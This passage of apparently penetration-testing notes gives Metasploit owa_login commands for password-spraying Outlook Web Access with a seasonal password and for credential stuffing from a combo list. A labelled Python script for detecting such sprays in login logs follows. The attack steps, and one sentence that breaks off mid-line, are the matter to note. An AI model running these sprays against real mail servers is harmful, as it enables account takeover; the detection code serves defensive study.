His favorite tool for OWA is Metasploit:
search owa
use 6
or
use auxiliary/scanner/http/owa_login
options
set password Winter24!
set user_file users.txt
set threads 10
optional:
set STOP_ON_SUCCESS true
run
For captured passwords/credential stuffing with both values in the same file (like user:password):
set USERPASS_FILE combolist.txt
set threads 10
optional:
set STOP_ON_SUCCESS true
run
Metasploit makes a list of valid users based on the delay on the response from the
Successful OWA login with no MFA
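
Added example (not part of the original notes): the defender's view of the spray and combo-list runs above. It flags a source that fails logins against many distinct accounts inside a short window and lists any account that logged in successfully from that source; the log layout, thresholds and sample rows are constructed assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample rows: timestamp, source IP, username, outcome. The layout
# is an assumption; map your own OWA authentication log fields onto it.
SAMPLE = """\
2024-01-15T09:00:01 203.0.113.7 alice FAIL
2024-01-15T09:00:01 203.0.113.7 bob FAIL
2024-01-15T09:00:02 203.0.113.7 carol FAIL
2024-01-15T09:00:02 203.0.113.7 dave FAIL
2024-01-15T09:00:03 203.0.113.7 erin OK
2024-01-15T09:00:04 203.0.113.7 frank FAIL
2024-01-15T09:05:00 198.51.100.20 alice FAIL
2024-01-15T09:05:30 198.51.100.20 alice FAIL
2024-01-15T09:06:10 198.51.100.20 alice OK
"""

def parse(text):
    for line in text.splitlines():
        ts, ip, user, outcome = line.split()
        yield datetime.fromisoformat(ts), ip, user.lower(), outcome

def detect_spray(events, window=timedelta(minutes=5), min_users=4):
    """Return (flagged, hits): sources that failed logins for >= min_users
    distinct accounts inside `window`, and accounts that logged in from them."""
    failures = defaultdict(deque)   # ip -> recent (ts, user) failures
    successes = defaultdict(set)    # ip -> users with a successful login
    flagged = {}                    # ip -> every account it failed against
    for ts, ip, user, outcome in sorted(events):
        if outcome != "FAIL":
            successes[ip].add(user)
            continue
        q = failures[ip]
        q.append((ts, user))
        while ts - q[0][0] > window:   # drop failures older than the window
            q.popleft()
        users = {u for _, u in q}
        # Many distinct accounts, not many tries on one account, marks a spray.
        if len(users) >= min_users:
            flagged.setdefault(ip, set()).update(users)
    hits = sorted((ip, u) for ip in flagged for u in successes[ip])
    return flagged, hits

if __name__ == "__main__":
    flagged, hits = detect_spray(parse(SAMPLE))
    for ip, users in flagged.items():
        print(f"spray from {ip}: {len(users)} accounts targeted")
    for ip, user in hits:
        print(f"valid login during spray: {user} from {ip} (reset, check MFA)")
```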